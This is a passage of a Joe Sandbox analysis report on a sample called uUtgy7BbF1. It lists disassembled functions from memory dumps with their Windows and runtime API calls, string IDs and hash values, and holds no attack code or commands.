                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6e4e8af73efbfb209cfe09b31445d3bf69348074f3a3383892a69fec13abe48f
                                                                                  • Instruction ID: 71cc694b795eba117cf9378a5a53a8597336b0837f4540bad7c117c05afde082
                                                                                  • Opcode Fuzzy Hash: 6e4e8af73efbfb209cfe09b31445d3bf69348074f3a3383892a69fec13abe48f
                                                                                  • Instruction Fuzzy Hash: DDD05E359142049AC7008F2DA500919B7F0EBC7750F00A52DB448E72A9CB71C8019709
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1e1811e256de978feef4c3cd29b6a07caae766e2687f34a7759ddec68fd786fd
                                                                                  • Instruction ID: d02d98b6c4407079e00ef93f935acfea29071d225d302e4f93154c128f20d5d8
                                                                                  • Opcode Fuzzy Hash: 1e1811e256de978feef4c3cd29b6a07caae766e2687f34a7759ddec68fd786fd
                                                                                  • Instruction Fuzzy Hash: FAB0127090C10087D504CF08C450470F378D747215F003418D00AB3102C310E800CA0C
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocString
                                                                                  • String ID: $"$"$'$'$*$+$+$/$0$4$6$8$:$<$=$=$A$C$E$G$H$I$I$K$M$M$O$O$Q$S$S$U$W$Y$[$]$_$i$k$m$o
                                                                                  • API String ID: 2525500382-871300800
                                                                                  • Opcode ID: ea0acaf6d4cacd1ba90045e13a6227656fbadf6fad3af0bdaba31410a1091882
                                                                                  • Instruction ID: cf4270bf8ffc7a5f823e8d7e11b60e879aec5e144cc898fab687690e48e742b5
                                                                                  • Opcode Fuzzy Hash: ea0acaf6d4cacd1ba90045e13a6227656fbadf6fad3af0bdaba31410a1091882
                                                                                  • Instruction Fuzzy Hash: 9291066150C7C1CDE3368638845879BBED11BA7218F088AADD5ED8B2D3C7BA4509CB67
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocString
                                                                                  • String ID: $"$"$'$'$*$+$+$/$0$4$6$8$:$<$=$=$A$C$E$G$H$I$I$K$M$M$O$O$Q$S$S$U$W$Y$[$]$_$i$k$m$o
                                                                                  • API String ID: 2525500382-871300800
                                                                                  • Opcode ID: e45984be38196b5c8ff72e5588430cd25e3479d51ec099cdc983a58aa1c9b1d2
                                                                                  • Instruction ID: 865d247f53da1c212b644144c37fe5ba321bca7ef231fb23b2e03194a57c13c3
                                                                                  • Opcode Fuzzy Hash: e45984be38196b5c8ff72e5588430cd25e3479d51ec099cdc983a58aa1c9b1d2
                                                                                  • Instruction Fuzzy Hash: 5C91E76110C7C18DE3368638885879BBED11BA7218F188A9DD1ED8B2D3C6BA454AC767
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit
                                                                                  • String ID: Z$a$c$g$n$p$p$s$t$w${$~
                                                                                  • API String ID: 2610073882-3241135356
                                                                                  • Opcode ID: e4bafa1799fc74d6fdec72762fe4337596049604b772f4dce9c6462e0ef1b261
                                                                                  • Instruction ID: 5cfd81fbbfab52470edc20309123d5fdb3929ff031e16fa1184257613a9df237
                                                                                  • Opcode Fuzzy Hash: e4bafa1799fc74d6fdec72762fe4337596049604b772f4dce9c6462e0ef1b261
                                                                                  • Instruction Fuzzy Hash: 56412A7550D3C0CAE366CB28C49878FBFE26BD6308F58885CE5C50B396D6BA9509C763
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitVariant
                                                                                  • String ID: Z$a$c$g$n$p$p$s$t$w${$~
                                                                                  • API String ID: 1927566239-3241135356
                                                                                  • Opcode ID: 75c46943b2651eac38ca81ac704b743c7024d952c1a77a819c42d2055e78dec7
                                                                                  • Instruction ID: 5e74e55bfebdbfff89dcf67c6b6cd9f6728498efe2e3599b3f27d88dd375cd61
                                                                                  • Opcode Fuzzy Hash: 75c46943b2651eac38ca81ac704b743c7024d952c1a77a819c42d2055e78dec7
                                                                                  • Instruction Fuzzy Hash: 9D414F7150D3C0CEE366CB28C49874BBFE25BD6308F49889DE5C44B396C6BA9509C763
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,0069A19D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0069A258
                                                                                  • __alloca_probe_16.LIBCMT ref: 0069A313
                                                                                  • __alloca_probe_16.LIBCMT ref: 0069A3A2
                                                                                  • __freea.LIBCMT ref: 0069A3ED
                                                                                  • __freea.LIBCMT ref: 0069A3F3
                                                                                  • __freea.LIBCMT ref: 0069A429
                                                                                  • __freea.LIBCMT ref: 0069A42F
                                                                                  • __freea.LIBCMT ref: 0069A43F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                  • String ID:
                                                                                  • API String ID: 127012223-0
                                                                                  • Opcode ID: 7d8b9ff974d7fdbb10fc8a2c0b20e0460e1612299f990adcd27e484d3b00739a
                                                                                  • Instruction ID: acfe2d0dba9c9fc05706e937734e2dc5e805912f35fa8e4ce5320082f2f0fc1a
                                                                                  • Opcode Fuzzy Hash: 7d8b9ff974d7fdbb10fc8a2c0b20e0460e1612299f990adcd27e484d3b00739a
                                                                                  • Instruction Fuzzy Hash: 6371F3729002459BEF21AFE48C81BEE77EFAF49710F284059E804A7781EA769D0187D2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 3213747228-0
                                                                                  • Opcode ID: 76cd254f3b8e765761cdde82e3165a3a1630fbfe1fb7a850d07f14f5abbed5a0
                                                                                  • Instruction ID: 576021b09afc6409f7170cd32ad46e8875f385a152753421d5c04db468f97b58
                                                                                  • Opcode Fuzzy Hash: 76cd254f3b8e765761cdde82e3165a3a1630fbfe1fb7a850d07f14f5abbed5a0
                                                                                  • Instruction Fuzzy Hash: 52B13672A04255AFDB15AF68CC81BEEBBA7EF65310F144299E905AF3C2D274D901C7B0
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067F827
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0067F82F
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067F8B8
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0067F8E3
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067F938
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 1170836740-1018135373
                                                                                  • Opcode ID: 15d936ece78bca1254026e1b19733eafd1722bdcd1403cba8dabfd3ee668b05b
                                                                                  • Instruction ID: f120462aa7b71c7ed498b5a85d4ad06552af5174a41f37d39299af998d14fb51
                                                                                  • Opcode Fuzzy Hash: 15d936ece78bca1254026e1b19733eafd1722bdcd1403cba8dabfd3ee668b05b
                                                                                  • Instruction Fuzzy Hash: 7841C630A00218ABCF10EF68C845E9E7BB7AF45314F14C26AED189B352D775EE05CB95
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,0068BE51,006735D2,?,00000000,?), ref: 0068BE03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID: api-ms-$ext-ms-
                                                                                  • API String ID: 3664257935-537541572
                                                                                  • Opcode ID: 603c0cc84a210a6f097dc5fd174ddfd08883448063fda667de7ef9147cb1cdb3
                                                                                  • Instruction ID: e646a8712a590da30cc91d6b0b6a391bd81f95b26dff09217e8e6d5e0ce67648
                                                                                  • Opcode Fuzzy Hash: 603c0cc84a210a6f097dc5fd174ddfd08883448063fda667de7ef9147cb1cdb3
                                                                                  • Instruction Fuzzy Hash: 2221C371A01215BBD721BB64DC41A9A775BEF827A0F252324E916A7391DB70FD01CBD0
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0067EB22
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0067EB30
                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0067EB41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                  • API String ID: 667068680-1047828073
                                                                                  • Opcode ID: a9d49e0b6812a12444cdfaeb98405d6bf4e34d4ca42054cc08df77e0b42a1f4f
                                                                                  • Instruction ID: af8e87d92460fc587ae9d63d3bcfc609a5395057049ffb379c834174f544270a
                                                                                  • Opcode Fuzzy Hash: a9d49e0b6812a12444cdfaeb98405d6bf4e34d4ca42054cc08df77e0b42a1f4f
                                                                                  • Instruction Fuzzy Hash: 51D09E356893206F8300BB70BC0A8963E97BE476557069455F601D2665DBF41D418F94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93aecd37d6b7aa43ee769c7cb4f58bca929973f394b1e71eaca88b2cad6aaebd
                                                                                  • Instruction ID: a5951416ea0f8d8fd1bde7dff543e7c18b9c45c48cb8d5171ba928b00ee92c67
                                                                                  • Opcode Fuzzy Hash: 93aecd37d6b7aa43ee769c7cb4f58bca929973f394b1e71eaca88b2cad6aaebd
                                                                                  • Instruction Fuzzy Hash: 00B10470A04249AFDF11EF98C891BAE7BBBBF56314F140159E401AB792CB709D46CBA4
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,00689AEB,0067F5BA,0067E585), ref: 00689B02
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00689B10
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00689B29
                                                                                  • SetLastError.KERNEL32(00000000,00689AEB,0067F5BA,0067E585), ref: 00689B7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: bdec31ff8058fef8a187d17bd290dab1edb2362af7b494e451ed1775431c660d
                                                                                  • Instruction ID: 8d156b2d3aed5f5785c49dd32eefcfa06170c4fe3bf1f579c54e6a863abd32a2
                                                                                  • Opcode Fuzzy Hash: bdec31ff8058fef8a187d17bd290dab1edb2362af7b494e451ed1775431c660d
                                                                                  • Instruction Fuzzy Hash: 4F012832219A116F9B6137B5FC8597B2B9BEB06771728032EF222616F1FF215C009764
                                                                                  APIs
                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0068A4DB
                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0068A754
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 2673424686-393685449
                                                                                  • Opcode ID: e3d4479e77d73648df132269afdbd8f1ac60c58527f52ceaae4014a8e6845d02
                                                                                  • Instruction ID: 7009716208625107aedca35593bfa1c200922fd4aed29e3df7d4509ea791a3f1
                                                                                  • Opcode Fuzzy Hash: e3d4479e77d73648df132269afdbd8f1ac60c58527f52ceaae4014a8e6845d02
                                                                                  • Instruction Fuzzy Hash: 26B18C71800209DFDF18EFE4C9419AEB7B6BF14310F18465EEC056B216E771EA91CBA6
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0069B3E5,000000FF,?,00684B4A,00684A31,?,00684BE6,00000000), ref: 00684ABE
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00684AD0
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,0069B3E5,000000FF,?,00684B4A,00684A31,?,00684BE6,00000000), ref: 00684AF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 78c646906be3ac8db1f6ab7820633cd91f1e05434861ce0d367c56ebe52be283
                                                                                  • Instruction ID: 4becbbd43ebfc21b6e4f336f2a6c76630585cddb16f97556eb2ec5952e455443
                                                                                  • Opcode Fuzzy Hash: 78c646906be3ac8db1f6ab7820633cd91f1e05434861ce0d367c56ebe52be283
                                                                                  • Instruction Fuzzy Hash: F201A735A44615AFCB11AF80DC05BAE7BFEFB45B15F010625F821A6690DFB4AD00CF94
                                                                                  APIs
                                                                                  • __alloca_probe_16.LIBCMT ref: 0068C59B
                                                                                  • __alloca_probe_16.LIBCMT ref: 0068C664
                                                                                  • __freea.LIBCMT ref: 0068C6CB
                                                                                    • Part of subcall function 0068AD61: HeapAlloc.KERNEL32(00000000,?,?,?,0067B9E5,?,?,006735D2,00001000,?,0067351A), ref: 0068AD93
                                                                                  • __freea.LIBCMT ref: 0068C6DE
                                                                                  • __freea.LIBCMT ref: 0068C6EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1096550386-0
                                                                                  • Opcode ID: f90fdeb8bd9b54b18a4701bd8bde3a640eb29533f26c3fe3ceb2cc624f4ae606
                                                                                  • Instruction ID: ae755cbac6dbf518b2a9a7077af44043ccb2f528212c0b11624e9dc3e39daec8
                                                                                  • Opcode Fuzzy Hash: f90fdeb8bd9b54b18a4701bd8bde3a640eb29533f26c3fe3ceb2cc624f4ae606
                                                                                  • Instruction Fuzzy Hash: 6D518F72600206AFEB21BE648C81DEB7BABEF44720B25563ABD04D6241FB71DC908774
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandleSize
                                                                                  • String ID:
                                                                                  • API String ID: 3849164406-0
                                                                                  • Opcode ID: 2cb2ffbe635ff0ba562d339592e9658313324b824314ea95fbee8a25dabf3164
                                                                                  • Instruction ID: c470a64b974e6e38500708a5f7107ed2a400706748f57c4b8cc4edd14bb299b5
                                                                                  • Opcode Fuzzy Hash: 2cb2ffbe635ff0ba562d339592e9658313324b824314ea95fbee8a25dabf3164
                                                                                  • Instruction Fuzzy Hash: DC719EB0D04248CFCB50EFA8D59879DBBF1BF49304F10852AE499AB341D774A945CF56
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0067E8FB
                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,0069B3C8,000000FF,?,0067B697), ref: 0067E91A
                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,0069B3C8,000000FF,?,0067B697), ref: 0067E948
                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,0069B3C8,000000FF,?,0067B697), ref: 0067E9A3
                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,0069B3C8,000000FF,?,0067B697), ref: 0067E9BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                  • String ID:
                                                                                  • API String ID: 66001078-0
                                                                                  • Opcode ID: 1c1c3f728802181536541a028e204d2f824d8277be562337bc966a42d2587ff1
                                                                                  • Instruction ID: c8b5abcb2b18580c68b24e45c95122f606a32d8fa1a38a97f81b77c28fd1a074
                                                                                  • Opcode Fuzzy Hash: 1c1c3f728802181536541a028e204d2f824d8277be562337bc966a42d2587ff1
                                                                                  • Instruction Fuzzy Hash: 36418E32600606DFCB60DF65C4859AAB3F6FF4D310B10869AE65AD7640E732F989CB51
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 0067C05B
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0067C066
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0067C0D4
                                                                                    • Part of subcall function 0067BF5D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0067BF75
                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 0067C081
                                                                                  • _Yarn.LIBCPMT ref: 0067C097
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                  • String ID:
                                                                                  • API String ID: 1088826258-0
